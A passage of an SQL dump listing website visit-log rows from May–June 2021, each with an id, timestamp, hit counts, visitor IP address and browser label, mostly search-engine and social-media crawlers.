555130,1620952196,1,1,0,0,'5.255.253.87','other'),(555131,1620952334,1,0,1,0,'66.249.70.49',''),(555132,1620954231,1,0,1,0,'66.249.70.47',''),(555133,1620959713,3,3,0,0,'5.255.253.92','other'),(555134,1620963351,1,0,1,0,'66.249.70.49',''),(555135,1620964315,1,1,0,0,'5.255.253.92','other'),(555136,1620966850,1,1,0,0,'66.249.70.49','chrome'),(555137,1620975540,1,1,0,0,'5.255.253.92','other'),(555138,1620980622,1,0,1,0,'66.249.70.47',''),(555139,1620980739,1,1,0,0,'5.255.253.92','other'),(555140,1620987315,1,1,0,0,'66.249.70.49','chrome'),(555141,1620989598,1,1,0,0,'5.255.253.87','other'),(555142,1620991338,1,1,0,0,'178.151.59.93','chrome'),(555143,1620993734,1,1,0,0,'66.249.70.51','chrome'),(555144,1620996557,1,1,0,0,'66.249.70.51','chrome'),(555145,1621003934,1,0,1,0,'66.249.70.47',''),(555146,1621005505,1,0,1,0,'66.249.70.51',''),(555147,1621005570,1,1,0,0,'66.249.70.47','chrome'),(555148,1621014581,1,0,1,0,'66.249.70.51',''),(555149,1621014622,1,0,1,0,'66.249.70.49',''),(555150,1621015881,1,1,0,0,'66.249.70.47','chrome'),(555151,1621016897,1,1,0,0,'95.111.239.17','firefox'),(555152,1621016989,1,1,0,0,'173.252.111.117','other'),(555153,1621018419,1,0,1,0,'66.249.70.47',''),(555154,1621021805,1,1,0,0,'66.249.70.47','chrome'),(555155,1621027437,3,2,1,0,'66.249.70.47',''),(555156,1621027469,5,5,0,0,'66.249.70.47','chrome'),(555157,1621027666,1,1,0,0,'66.249.70.51','chrome'),(555158,1621027707,1,0,1,0,'66.249.70.49',''),(555159,1621028895,1,0,1,0,'66.249.70.51',''),(555160,1621029458,1,0,1,0,'66.249.70.49',''),(555161,1621031127,2,2,0,0,'66.249.70.51','chrome'),(555162,1621031149,1,1,0,0,'66.249.70.49','chrome'),(555163,1621032788,2,2,0,0,'66.249.70.47','chrome'),(555164,1621034832,1,1,0,0,'66.249.70.51','chrome'),(555165,1621036702,1,0,1,0,'66.249.70.49',''),(555166,1621039993,2,1,1,0,'66.249.70.49',''),(555167,1621045859,1,1,0,0,'66.249.70.47','chrome'),(555168,1621051290,1,0,1,0,'66.249.70.51',''),(555169,1621056245,1,0,1,0,'66.249.70.51',''),(555170,1621061243,1,1,0,0,'5.255.253.92','chrome'),(555171,1621061507,1,1,0,0,'5.255.253.87','other'),(555172,1621072427,1,1,0,0,'66.249.70.49','chrome'),(555173,1621072453,1,0,1,0,'66.249.70.51',''),(555174,1621074163,1,1,0,0,'66.249.70.47','chrome'),(555175,1621074893,1,1,0,0,'66.249.70.51','chrome'),(555176,1621078214,1,1,0,0,'66.249.70.51','chrome'),(555177,1621079447,1,1,0,0,'66.249.70.49','chrome'),(555178,1621083217,1,1,0,0,'66.249.70.49','chrome'),(555179,1621083332,2,1,1,0,'66.249.70.47',''),(555180,1621085290,1,0,1,0,'66.249.70.49',''),(555181,1621090115,1,0,1,0,'66.249.70.51',''),(555182,1621094107,1,0,1,0,'66.249.70.49',''),(555183,1621097400,1,0,1,0,'66.249.70.51',''),(555184,1621099190,1,0,1,0,'66.249.70.47',''),(555185,1621100198,1,1,0,0,'66.249.70.51','chrome'),(555186,1621100212,1,1,0,0,'66.249.70.49','chrome'),(555187,1621106169,1,1,0,0,'66.249.70.49','chrome'),(555188,1621110552,1,1,0,0,'66.249.70.49','chrome'),(555189,1621113624,1,1,0,0,'213.180.203.79','other'),(555190,1621115083,1,0,1,0,'66.249.70.47',''),(555191,1621121159,1,0,1,0,'66.249.70.47',''),(555192,1621122595,1,1,0,0,'66.249.70.51','chrome'),(555193,1621132161,1,0,1,0,'66.249.70.47',''),(555194,1621134563,1,1,0,0,'66.249.70.49','chrome'),(555195,1621145091,1,0,1,0,'66.249.70.51',''),(555196,1621151852,1,0,1,0,'66.249.70.49',''),(555197,1621159730,1,1,0,0,'66.249.70.49','chrome'),(555198,1621161507,1,1,0,0,'31.13.103.21','other'),(555199,1621164908,1,0,1,0,'66.249.70.51',''),(555200,1621169061,1,0,1,0,'66.249.70.47',''),(555201,1621170668,1,0,1,0,'66.249.70.49',''),(555202,1621174316,1,0,1,0,'66.249.70.51',''),(555203,1621176044,1,0,1,0,'66.249.70.49',''),(555204,1621194582,1,1,0,0,'92.119.161.232','chrome'),(555205,1621194584,1,1,0,0,'92.119.161.232','other'),(555206,1621205066,1,0,1,0,'66.249.70.47',''),(555207,1621212598,2,0,2,0,'66.249.70.47',''),(555208,1621218473,1,1,0,0,'66.249.70.51','chrome'),(555209,1621223412,5,5,0,0,'18.229.73.207','chrome'),(555210,1621235712,1,1,0,0,'199.244.88.132','chrome'),(555211,1621240278,1,0,1,0,'66.249.70.47',''),(555212,1621244538,2,2,0,0,'5.255.253.92','other'),(555213,1621245985,1,1,0,0,'69.171.249.7','other'),(555214,1621249222,1,1,0,0,'5.255.253.92','other'),(555215,1621259215,2,1,1,0,'66.249.70.47',''),(555216,1621276404,1,0,1,0,'66.249.70.47',''),(555217,1621282684,1,1,0,0,'5.255.253.87','other'),(555218,1621299377,1,1,0,0,'61.135.15.173','chrome'),(555219,1621311699,1,0,1,0,'66.249.70.15',''),(555220,1621314002,1,1,0,0,'66.249.70.19','chrome'),(555221,1621314392,1,0,1,0,'66.249.70.17',''),(555222,1621327009,1,1,0,0,'66.249.70.15','chrome'),(555223,1621327275,1,1,0,0,'92.119.161.204','chrome'),(555224,1621327276,1,1,0,0,'92.119.161.204','other'),(555225,1621340961,1,1,0,0,'31.13.127.33','other'),(555226,1621347759,1,1,0,0,'5.255.253.92','other'),(555227,1621347792,1,0,1,0,'66.249.70.15',''),(555228,1621349871,1,1,0,0,'5.255.253.92','other'),(555229,1621360741,1,1,0,0,'51.15.251.143','other'),(555230,1621369966,2,2,0,0,'77.222.156.42','chrome'),(555231,1621376782,1,1,0,0,'5.255.253.92','other'),(555232,1621377583,1,1,0,0,'51.158.109.3','other'),(555233,1621387853,1,0,1,0,'66.249.70.47',''),(555234,1621398092,1,1,0,0,'66.249.70.51','chrome'),(555235,1621402908,1,1,0,0,'31.13.127.113','other'),(555236,1621403692,3,3,0,0,'61.111.129.36','firefox'),(555237,1621408182,3,3,0,0,'193.236.83.48','firefox'),(555238,1621412296,1,1,0,0,'51.15.195.246','other'),(555239,1621413575,1,1,0,0,'5.255.253.92','other'),(555240,1621414784,1,1,0,0,'66.249.70.39','chrome'),(555241,1621416473,1,1,0,0,'31.13.103.24','other'),(555243,1621425112,1,1,0,0,'66.249.70.39','chrome'),(555244,1621427750,1,1,0,0,'66.249.70.39','chrome'),(555245,1621428362,1,0,1,0,'66.249.70.37',''),(555246,1621429500,1,0,1,0,'66.249.70.39',''),(555247,1621439175,1,1,0,0,'31.13.103.11','other'),(555248,1621439211,1,1,0,0,'31.13.103.7','other'),(555249,1621439254,1,1,0,0,'31.13.103.4','other'),(555250,1621439258,1,1,0,0,'69.171.251.20','other'),(555251,1621439262,1,1,0,0,'66.220.149.35','other'),(555252,1621439263,1,1,0,0,'31.13.103.118','other'),(555253,1621439274,1,1,0,0,'31.13.103.14','other'),(555254,1621439275,2,2,0,0,'31.13.103.17','other'),(555255,1621439276,1,1,0,0,'31.13.103.1','other'),(555256,1621439277,1,1,0,0,'31.13.103.113','other'),(555257,1621446691,1,1,0,0,'66.249.70.41','chrome'),(555258,1621454430,1,1,0,0,'54.86.206.124','other'),(555259,1621460877,1,1,0,0,'66.249.70.41','chrome'),(555260,1621469544,1,0,1,0,'66.249.70.41',''),(555261,1621470108,1,0,1,0,'66.249.70.39',''),(555262,1621470260,1,0,1,0,'66.249.70.37',''),(555263,1621474165,1,1,0,0,'66.249.70.41','chrome'),(555264,1621474166,1,0,1,0,'66.249.70.39',''),(555265,1621481773,1,1,0,0,'5.255.253.92','other'),(555266,1621484642,1,1,0,0,'66.249.70.37','chrome'),(555267,1621496288,1,1,0,0,'66.249.70.37','chrome'),(555268,1621500727,5,5,0,0,'52.52.190.187','chrome'),(555269,1621510693,1,1,0,0,'66.249.70.41','chrome'),(555270,1621511265,1,0,1,0,'66.249.70.39',''),(555271,1621511863,3,0,3,0,'66.249.70.37',''),(555272,1621516075,1,0,1,0,'66.249.70.39',''),(555273,1621537639,1,1,0,0,'173.252.95.41','other'),(555274,1621537640,1,1,0,0,'173.252.95.14','other'),(555275,1621539526,3,3,0,0,'129.226.48.4','firefox'),(555276,1621545026,1,0,1,0,'66.249.70.37',''),(555277,1621545502,1,1,0,0,'66.249.70.37','chrome'),(555278,1621546448,1,1,0,0,'66.249.70.39','chrome'),(555279,1621553744,1,1,0,0,'135.181.252.234','chrome'),(555280,1621554903,2,1,1,0,'66.249.70.39',''),(555281,1621555945,1,0,1,0,'66.249.70.37',''),(555282,1621556455,1,0,1,0,'66.249.70.39',''),(555283,1621556471,1,1,0,0,'66.249.70.37','chrome'),(555284,1621566261,1,1,0,0,'66.249.70.37','chrome'),(555285,1621566264,1,1,0,0,'66.249.70.39','chrome'),(555286,1621567359,3,3,0,0,'149.202.8.66','firefox'),(555287,1621570474,1,1,0,0,'136.243.111.17','other'),(555288,1621570478,1,1,0,0,'88.99.59.130','other'),(555289,1621572091,1,1,0,0,'5.255.253.92','other'),(555290,1621573961,1,1,0,0,'176.98.69.253','chrome'),(555291,1621584013,1,1,0,0,'66.249.70.41','chrome'),(555292,1621592538,1,0,1,0,'66.249.70.41',''),(555293,1621594222,1,0,1,0,'66.249.70.39',''),(555294,1621595147,1,1,0,0,'66.249.70.39','chrome'),(555295,1621598528,1,0,1,0,'66.249.70.41',''),(555296,1621621922,1,1,0,0,'66.249.70.39','chrome'),(555297,1621624983,1,1,0,0,'31.13.103.12','other'),(555298,1621628940,1,1,0,0,'66.249.70.41','chrome'),(555299,1621641786,1,0,1,0,'66.249.70.37',''),(555300,1621646386,1,1,0,0,'66.249.70.41','chrome'),(555301,1621654118,1,1,0,0,'66.249.70.41','chrome'),(555302,1621665484,1,1,0,0,'173.252.111.15','other'),(555303,1621674378,1,1,0,0,'87.247.143.240','chrome'),(555304,1621674379,1,1,0,0,'87.247.143.240','firefox'),(555305,1621682510,1,0,1,0,'66.249.70.37',''),(555306,1621702441,3,3,0,0,'167.99.231.12','firefox'),(555307,1621702481,1,1,0,0,'173.252.79.2','other'),(555308,1621706227,1,1,0,0,'87.247.143.212','firefox'),(555309,1621706228,1,1,0,0,'87.247.143.212','other'),(555310,1621707372,1,1,0,0,'5.255.253.87','other'),(555311,1621719499,1,0,1,0,'66.249.70.37',''),(555312,1621742754,1,1,0,0,'31.13.103.12','other'),(555313,1621744989,1,1,0,0,'5.255.253.92','other'),(555314,1621753784,1,1,0,0,'61.135.15.134','chrome'),(555315,1621754977,1,0,1,0,'66.249.70.41',''),(555316,1621755643,1,0,1,0,'66.249.70.37',''),(555317,1621767425,1,1,0,0,'5.255.253.92','other'),(555318,1621788090,1,1,0,0,'5.255.253.92','other'),(555319,1621789260,1,1,0,0,'5.255.253.175','other'),(555320,1621792619,1,0,1,0,'66.249.70.37',''),(555321,1621792950,2,2,0,0,'173.252.111.112','other'),(555322,1621793214,1,1,0,0,'66.249.70.41','chrome'),(555323,1621798561,1,1,0,0,'173.252.83.22','other'),(555324,1621803131,4,4,0,0,'34.221.200.216','chrome'),(555325,1621804488,1,1,0,0,'5.255.253.92','other'),(555326,1621820046,1,0,1,0,'66.249.70.39',''),(555327,1621821555,1,1,0,0,'5.255.253.92','other'),(555328,1621827021,1,0,1,0,'66.249.70.37',''),(555329,1621833265,1,1,0,0,'5.255.253.92','other'),(555330,1621838612,1,1,0,0,'213.180.203.111','other'),(555331,1621839727,1,1,0,0,'5.45.207.186','other'),(555332,1621847037,1,1,0,0,'5.255.253.92','other'),(555333,1621848125,2,2,0,0,'31.13.103.5','other'),(555334,1621848509,1,1,0,0,'5.255.253.87','other'),(555335,1621863215,1,0,1,0,'66.249.70.37',''),(555336,1621865302,1,1,0,0,'5.255.231.111','other'),(555337,1621867902,1,1,0,0,'5.255.231.111','other'),(555338,1621868951,2,2,0,0,'5.255.231.111','other'),(555339,1621876180,1,1,0,0,'5.255.231.111','other'),(555340,1621886799,1,1,0,0,'5.255.253.87','other'),(555341,1621886869,1,1,0,0,'173.252.111.21','other'),(555342,1621898478,1,0,1,0,'66.249.70.37',''),(555343,1621898485,1,1,0,0,'5.255.253.92','other'),(555344,1621909054,1,1,0,0,'5.45.207.150','other'),(555345,1621915670,1,1,0,0,'5.255.231.129','other'),(555346,1621916243,5,5,0,0,'52.60.209.36','chrome'),(555347,1621919753,1,1,0,0,'5.255.253.92','other'),(555348,1621934103,1,1,0,0,'5.255.253.92','other'),(555349,1621937770,1,1,0,0,'5.255.253.87','other'),(555350,1621941200,1,1,0,0,'5.255.253.92','other'),(555351,1621948095,1,0,1,0,'66.249.70.5',''),(555352,1621950762,1,1,0,0,'5.255.253.92','other'),(555353,1621951645,1,1,0,0,'185.237.217.11','chrome'),(555354,1621953886,1,1,0,0,'5.255.231.19','other'),(555355,1621957198,1,1,0,0,'5.255.253.92','other'),(555356,1621959354,1,1,0,0,'5.255.253.87','other'),(555357,1621967621,1,1,0,0,'5.255.253.92','other'),(555358,1621969174,1,1,0,0,'173.252.111.118','other'),(555359,1621969465,1,1,0,0,'5.45.207.150','other'),(555360,1621973714,1,1,0,0,'5.255.231.187','other'),(555361,1621974744,3,3,0,0,'216.177.141.15','firefox'),(555362,1621977074,1,1,0,0,'44.235.90.64','chrome'),(555363,1621979144,1,1,0,0,'213.180.203.105','other'),(555364,1621979219,1,1,0,0,'5.255.231.88','other'),(555365,1621997346,1,0,1,0,'66.249.70.5',''),(555366,1621997845,2,2,0,0,'5.255.253.92','other'),(555367,1622001587,1,1,0,0,'89.184.66.143','firefox'),(555368,1622002782,3,3,0,0,'139.99.45.136','firefox'),(555369,1622004690,3,3,0,0,'5.255.253.92','other'),(555370,1622016480,1,1,0,0,'5.255.253.92','other'),(555371,1622020658,1,1,0,0,'5.255.253.92','other'),(555372,1622024090,1,1,0,0,'5.255.253.92','other'),(555373,1622040642,1,1,0,0,'121.166.102.131','chrome'),(555374,1622041358,1,1,0,0,'5.255.253.92','other'),(555375,1622047216,1,0,1,0,'66.249.70.5',''),(555376,1622052458,1,1,0,0,'213.180.203.39','other'),(555377,1622053070,1,1,0,0,'37.57.110.249','firefox'),(555378,1622054849,1,1,0,0,'173.252.111.5','other'),(555379,1622056936,1,1,0,0,'5.255.253.87','other'),(555380,1622068695,1,0,1,0,'66.249.70.5',''),(555381,1622069749,1,1,0,0,'66.249.70.9','chrome'),(555382,1622080864,2,2,0,0,'5.255.253.92','other'),(555383,1622093008,1,1,0,0,'5.255.253.92','other'),(555384,1622093914,1,1,0,0,'5.255.253.92','other'),(555385,1622097235,1,1,0,0,'5.58.16.182','firefox'),(555386,1622098831,1,0,1,0,'66.249.70.5',''),(555387,1622100230,1,1,0,0,'5.255.253.92','other'),(555388,1622107945,5,5,0,0,'35.180.147.121','chrome'),(555389,1622114843,1,1,0,0,'5.255.253.92','other'),(555390,1622116709,1,1,0,0,'66.249.89.39','other'),(555391,1622126650,1,1,0,0,'5.45.207.150','other'),(555392,1622132297,1,1,0,0,'5.255.253.92','other'),(555393,1622133992,5,5,0,0,'18.136.72.135','chrome'),(555394,1622134954,1,1,0,0,'5.45.207.112','other'),(555395,1622137105,3,3,0,0,'67.205.42.180','firefox'),(555396,1622138493,1,1,0,0,'66.249.70.5','chrome'),(555397,1622140089,1,1,0,0,'5.255.253.92','other'),(555398,1622144405,1,1,0,0,'23.228.109.147','chrome'),(555399,1622146548,3,3,0,0,'8.210.116.184','firefox'),(555400,1622152210,1,0,1,0,'66.249.70.5',''),(555401,1622155940,1,1,0,0,'5.255.253.81','other'),(555402,1622164111,1,1,0,0,'5.255.253.92','other'),(555403,1622172642,1,1,0,0,'5.255.253.92','other'),(555404,1622176956,1,1,0,0,'5.45.207.186','other'),(555405,1622178382,1,1,0,0,'31.13.103.4','other'),(555406,1622190948,1,1,0,0,'23.228.109.147','chrome'),(555407,1622199982,1,1,0,0,'5.255.253.92','other'),(555408,1622200285,1,1,0,0,'66.249.70.7','chrome'),(555409,1622200452,1,1,0,0,'66.249.70.9','chrome'),(555410,1622204133,1,1,0,0,'5.255.253.87','other'),(555411,1622205146,1,1,0,0,'66.249.70.9','chrome'),(555412,1622205585,1,1,0,0,'66.249.70.27','chrome'),(555413,1622206204,1,0,1,0,'66.249.70.5',''),(555414,1622207112,1,1,0,0,'66.249.70.9','chrome'),(555415,1622210645,1,1,0,0,'66.249.70.5','chrome'),(555416,1622213569,1,1,0,0,'66.249.70.5','chrome'),(555417,1622214249,1,0,1,0,'66.249.70.7',''),(555418,1622214903,1,1,0,0,'5.255.253.87','other'),(555419,1622216035,1,1,0,0,'66.249.70.5','chrome'),(555420,1622219358,1,1,0,0,'5.255.253.92','other'),(555421,1622219887,1,1,0,0,'34.96.130.27','other'),(555422,1622223326,1,1,0,0,'66.249.70.7','chrome'),(555423,1622223839,1,1,0,0,'66.249.70.5','chrome'),(555424,1622224074,1,1,0,0,'114.33.19.90','firefox'),(555425,1622225128,1,1,0,0,'66.249.83.60','chrome'),(555426,1622225133,1,1,0,0,'94.153.78.192','chrome'),(555427,1622226452,1,0,1,0,'66.249.70.7',''),(555428,1622226792,1,1,0,0,'5.255.253.87','other'),(555429,1622229091,1,1,0,0,'66.249.70.7','chrome'),(555430,1622234127,1,1,0,0,'66.249.70.7','chrome'),(555431,1622237257,1,1,0,0,'66.249.70.5','chrome'),(555432,1622242813,1,1,0,0,'159.203.80.30','firefox'),(555433,1622244578,1,0,1,0,'66.249.70.5',''),(555434,1622244851,2,2,0,0,'66.249.70.5','chrome'),(555435,1622244948,1,1,0,0,'66.249.70.7','chrome'),(555436,1622245829,1,1,0,0,'5.255.253.87','other'),(555437,1622247838,1,0,1,0,'66.249.70.5',''),(555438,1622249070,1,0,1,0,'66.249.70.5',''),(555439,1622251970,1,1,0,0,'5.255.253.92','other'),(555440,1622251996,1,0,1,0,'66.249.70.7',''),(555441,1622253059,2,0,2,0,'66.249.70.7',''),(555442,1622253851,1,1,0,0,'66.249.70.9','chrome'),(555443,1622254557,2,2,0,0,'5.255.253.92','other'),(555444,1622256855,1,1,0,0,'5.255.253.92','other'),(555445,1622258224,1,1,0,0,'66.249.70.5','chrome'),(555446,1622259541,1,1,0,0,'5.255.253.87','other'),(555447,1622259743,1,1,0,0,'213.180.203.111','other'),(555448,1622260787,1,1,0,0,'66.249.70.9','chrome'),(555449,1622262397,1,0,1,0,'66.249.70.7',''),(555450,1622262558,1,0,1,0,'66.249.70.9',''),(555451,1622268135,1,0,1,0,'66.249.70.5',''),(555452,1622268222,1,1,0,0,'5.255.253.87','other'),(555453,1622270027,1,1,0,0,'5.255.253.92','other'),(555454,1622275430,1,1,0,0,'162.55.179.72','other'),(555455,1622276058,1,1,0,0,'23.228.109.147','chrome'),(555456,1622280211,1,1,0,0,'5.255.253.92','other'),(555457,1622284191,1,0,1,0,'66.249.70.7',''),(555458,1622287427,1,1,0,0,'31.13.127.9','other'),(555459,1622295230,4,4,0,0,'109.70.111.112','chrome'),(555460,1622300762,1,1,0,0,'5.255.253.92','other'),(555461,1622302206,1,1,0,0,'66.249.70.9','chrome'),(555462,1622302597,1,0,1,0,'66.249.70.7',''),(555463,1622309455,1,1,0,0,'5.255.253.92','other'),(555464,1622312814,1,0,1,0,'66.249.70.7',''),(555465,1622319680,1,0,1,0,'66.249.70.5',''),(555466,1622327945,1,0,1,0,'66.249.70.9',''),(555467,1622329686,1,1,0,0,'66.249.70.9','chrome'),(555468,1622335844,1,0,1,0,'66.249.70.9',''),(555469,1622337728,1,0,1,0,'66.249.70.9',''),(555470,1622341107,5,5,0,0,'3.0.115.255','chrome'),(555471,1622341728,2,0,2,0,'66.249.70.9',''),(555472,1622342525,1,1,0,0,'109.70.106.130','other'),(555473,1622356345,1,1,0,0,'64.246.165.210','firefox'),(555474,1622359311,1,1,0,0,'173.252.111.119','other'),(555476,1622359742,1,0,1,0,'66.249.70.9',''),(555477,1622361824,1,1,0,0,'173.252.111.23','other'),(555479,1622364948,1,1,0,0,'5.255.253.92','other'),(555480,1622366251,1,1,0,0,'46.211.13.142','chrome'),(555481,1622368205,1,1,0,0,'95.47.248.8','chrome'),(555482,1622385151,2,2,0,0,'5.255.253.92','other'),(555483,1622386200,1,1,0,0,'5.255.253.87','other'),(555484,1622387652,1,1,0,0,'66.249.70.7','chrome'),(555485,1622398399,1,0,1,0,'66.249.70.9',''),(555486,1622400461,1,1,0,0,'31.13.103.8','other'),(555487,1622400912,1,1,0,0,'66.249.70.5','chrome'),(555488,1622405334,1,0,1,0,'66.249.70.5',''),(555489,1622407588,1,1,0,0,'66.249.70.5','chrome'),(555490,1622409381,1,1,0,0,'66.249.70.9','chrome'),(555491,1622416709,1,0,1,0,'66.249.70.9',''),(555492,1622419648,1,0,1,0,'66.249.70.5',''),(555493,1622420181,1,0,1,0,'66.249.70.7',''),(555494,1622421140,1,1,0,0,'54.188.104.154','firefox'),(555495,1622433713,1,0,1,0,'66.249.70.9',''),(555496,1622435536,1,0,1,0,'66.249.70.9',''),(555497,1622435585,1,0,1,0,'66.249.70.7',''),(555498,1622436810,1,1,0,0,'66.249.70.5','chrome'),(555499,1622436876,1,0,1,0,'66.249.70.9',''),(555500,1622437057,2,2,0,0,'31.13.103.3','other'),(555501,1622438245,2,0,2,0,'66.249.70.7',''),(555502,1622441647,1,0,1,0,'66.249.70.9',''),(555503,1622444289,1,1,0,0,'5.255.253.87','other'),(555504,1622447514,1,1,0,0,'5.45.207.150','other'),(555505,1622449901,1,0,1,0,'66.249.70.5',''),(555506,1622476220,1,1,0,0,'66.249.70.5','chrome'),(555507,1622476335,1,1,0,0,'31.13.127.14','other'),(555508,1622476442,1,0,1,0,'66.249.70.9',''),(555509,1622487150,1,1,0,0,'91.196.178.193','chrome'),(555510,1622488672,1,1,0,0,'23.228.109.147','chrome'),(555511,1622491924,1,0,1,0,'66.249.70.5',''),(555512,1622496086,1,1,0,0,'66.249.70.9','chrome'),(555513,1622496637,1,1,0,0,'66.249.70.7','chrome'),(555514,1622498601,1,1,0,0,'66.249.70.7','chrome'),(555515,1622500083,1,1,0,0,'5.255.253.81','other'),(555516,1622501611,1,1,0,0,'134.122.11.243','other'),(555517,1622527740,1,1,0,0,'213.180.203.111','other'),(555518,1622532505,1,0,1,0,'66.249.70.9',''),(555519,1622534239,1,1,0,0,'31.13.127.23','other'),(555520,1622534261,1,1,0,0,'173.252.111.11','other'),(555521,1622534262,1,1,0,0,'173.252.111.21','other'),(555522,1622536077,5,5,0,0,'35.183.60.188','chrome'),(555523,1622537123,1,1,0,0,'23.228.109.147','chrome'),(555524,1622540108,1,1,0,0,'194.156.95.242','other'),(555525,1622540109,1,1,0,0,'194.156.95.242','chrome'),(555526,1622547464,1,1,0,0,'5.255.253.92','other'),(555527,1622547554,1,1,0,0,'66.249.70.7','chrome'),(555528,1622549356,1,1,0,0,'173.252.79.25','other'),(555529,1622561776,1,1,0,0,'66.249.70.7','chrome'),(555530,1622562074,1,1,0,0,'91.193.176.142','other'),(555531,1622564063,1,1,0,0,'5.255.253.92','other'),(555532,1622567024,1,0,1,0,'194.156.95.217',''),(555534,1622567453,1,0,1,0,'66.249.70.7',''),(555535,1622571941,3,3,0,0,'93.114.235.168','firefox'),(555536,1622573938,1,0,1,0,'66.249.70.5',''),(555537,1622586290,1,1,0,0,'34.96.130.24','other'),(555538,1622592436,1,1,0,0,'199.244.88.132','chrome'),(555539,1622594918,1,0,1,0,'66.249.70.9',''),(555540,1622596500,1,1,0,0,'66.249.70.5','chrome'),(555541,1622601879,1,0,1,0,'66.249.70.9',''),(555542,1622601996,1,1,0,0,'64.90.48.195','firefox'),(555543,1622601995,1,1,0,0,'64.90.48.195','firefox'),(555545,1622607943,1,1,0,0,'66.249.70.7','chrome'),(555546,1622608801,1,0,1,0,'66.249.70.5',''),(555547,1622613510,1,0,1,0,'66.249.70.5',''),(555548,1622623162,1,1,0,0,'5.255.253.92','other'),(555549,1622652898,2,1,1,0,'66.249.70.5',''),(555550,1622658369,3,3,0,0,'47.254.247.161','firefox'),(555551,1622663444,1,1,0,0,'173.252.111.118','other'),(555552,1622663761,1,1,0,0,'5.255.253.92','other'),(555553,1622665232,3,3,0,0,'34.68.97.70','firefox'),(555554,1622666912,2,1,1,0,'66.249.70.5',''),(555555,1622668244,1,1,0,0,'66.249.70.7','chrome'),(555556,1622672126,1,1,0,0,'5.255.253.92','other'),(555557,1622691608,1,1,0,0,'5.255.253.87','other'),(555558,1622697433,1,1,0,0,'5.255.253.92','other'),(555559,1622701059,1,0,1,0,'66.249.70.7',''),(555560,1622704784,1,0,1,0,'66.249.70.5',''),(555561,1622706254,1,1,0,0,'5.255.253.92','other'),(555562,1622711174,1,1,0,0,'69.171.251.9','chrome'),(555563,1622715716,1,1,0,0,'66.249.70.9','chrome'),(555564,1622719856,1,1,0,0,'5.255.253.87','other'),(555565,1622722429,1,0,1,0,'66.249.70.5',''),(555566,1622724966,1,1,0,0,'46.211.6.213','chrome'),(555567,1622735542,1,1,0,0,'5.255.253.92','other'),(555568,1622739871,1,1,0,0,'5.255.253.92','other'),(555569,1622743520,1,0,1,0,'66.249.70.9',''),(555570,1622744528,1,1,0,0,'159.203.117.206','other'),(555571,1622746278,1,1,0,0,'142.93.77.113','other'),(555572,1622746424,1,1,0,0,'5.255.253.92','other'),(555573,1622748014,1,1,0,0,'66.249.70.7','chrome'),(555574,1622750358,1,1,0,0,'66.249.70.7','chrome'),(555575,1622751158,1,1,0,0,'5.255.253.141','other'),(555576,1622752716,1,1,0,0,'5.255.253.92','other'),(555577,1622761073,1,1,0,0,'66.249.70.9','chrome'),(555578,1622761153,1,0,1,0,'66.249.70.7',''),(555579,1622763931,1,0,1,0,'66.249.70.5',''),(555580,1622767896,1,1,0,0,'5.255.253.87','other'),(555581,1622784055,1,1,0,0,'5.255.253.92','other'),(555582,1622808700,1,1,0,0,'5.255.253.92','other'),(555583,1622824347,1,1,0,0,'66.249.70.9','chrome'),(555584,1622826919,1,0,1,0,'66.249.70.5',''),(555585,1622827959,1,1,0,0,'5.255.253.87','other'),(555586,1622828835,3,2,1,0,'66.249.70.5',''),(555587,1622829781,3,3,0,0,'144.76.156.232','firefox'),(555588,1622830713,1,0,1,0,'66.249.70.7',''),(555589,1622831762,3,3,0,0,'51.254.49.156','firefox'),(555590,1622833385,1,1,0,0,'66.249.70.7','chrome'),(555591,1622833717,1,1,0,0,'5.255.253.138','other'),(555592,1622836870,1,1,0,0,'92.118.160.13','other'),(555593,1622840018,1,1,0,0,'66.249.70.7','chrome'),(555594,1622842099,1,1,0,0,'66.249.70.7','chrome'),(555595,1622845203,1,0,1,0,'66.249.70.7',''),(555596,1622846743,4,4,0,0,'66.249.70.5','chrome'),(555597,1622846746,3,3,0,0,'66.249.70.7','chrome'),(555598,1622848641,1,1,0,0,'66.249.70.9','chrome'),(555599,1622852117,1,0,1,0,'66.249.70.5',''),(555600,1622854791,1,0,1,0,'66.249.70.9',''),(555601,1622856050,1,1,0,0,'66.249.70.5','chrome'),(555602,1622863006,1,1,0,0,'66.249.70.9','chrome'),(555603,1622864484,1,1,0,0,'66.249.70.7','chrome'),(555604,1622866271,1,1,0,0,'5.255.253.92','other'),(555605,1622875728,1,0,1,0,'66.249.70.5',''),(555606,1622879253,1,0,1,0,'66.249.70.7',''),(555607,1622880968,1,1,0,0,'66.249.70.5','chrome'),(555608,1622883408,1,0,1,0,'66.249.70.7',''),(555609,1622888568,1,1,0,0,'34.96.130.29','other'),(555610,1622894728,1,1,0,0,'66.249.70.7','chrome'),(555611,1622901257,1,1,0,0,'5.255.253.87','other'),(555612,1622902756,1,1,0,0,'5.255.253.87','other'),(555613,1622923974,5,5,0,0,'13.236.114.230','chrome'),(555614,1622925360,1,1,0,0,'5.45.207.150','other'),(555615,1622933498,1,1,0,0,'5.255.253.87','other'),(555616,1622938512,1,0,1,0,'66.249.70.5',''),(555617,1622944194,1,1,0,0,'66.249.70.5','chrome'),(555618,1622950586,1,1,0,0,'5.255.231.190','other'),(555619,1622954977,1,1,0,0,'66.249.70.5','chrome'),(555620,1622956131,1,1,0,0,'5.255.253.92','other'),(555621,1622958835,1,1,0,0,'92.118.160.37','other'),(555622,1622958985,1,1,0,0,'173.252.95.2','other'),(555623,1622960877,1,0,1,0,'66.249.70.7',''),(555624,1622961704,1,1,0,0,'66.249.70.7','chrome'),(555625,1622963196,1,0,1,0,'66.249.70.5',''),(555626,1622967403,1,1,0,0,'66.249.70.9','chrome'),(555627,1622969895,1,1,0,0,'5.255.253.92','other'),(555628,1622972006,1,0,1,0,'66.249.70.5',''),(555629,1622985459,1,1,0,0,'5.255.253.92','other'),(555630,1622987306,1,1,0,0,'66.249.70.5','chrome'),(555631,1622991563,1,1,0,0,'5.255.253.92','other'),(555632,1622993147,1,0,1,0,'66.249.70.7',''),(555633,1622995009,1,1,0,0,'5.255.253.92','other'),(555634,1623002027,1,1,0,0,'5.255.253.92','other'),(555635,1623003693,1,1,0,0,'5.255.253.87','other'),(555636,1623022188,1,1,0,0,'31.13.103.4','other'),(555637,1623022189,1,1,0,0,'31.13.103.1','other'),(555638,1623024904,1,0,1,0,'66.249.70.7',''),(555639,1623040958,1,1,0,0,'66.249.70.7','chrome'),(555640,1623060674,2,2,0,0,'137.74.27.104','firefox'),(555641,1623061120,1,1,0,0,'5.255.253.92','other'),(555642,1623075878,1,1,0,0,'5.255.253.92','other'),(555643,1623095458,1,1,0,0,'5.255.231.105','other'),(555644,1623113596,1,1,0,0,'5.255.231.105','other'),(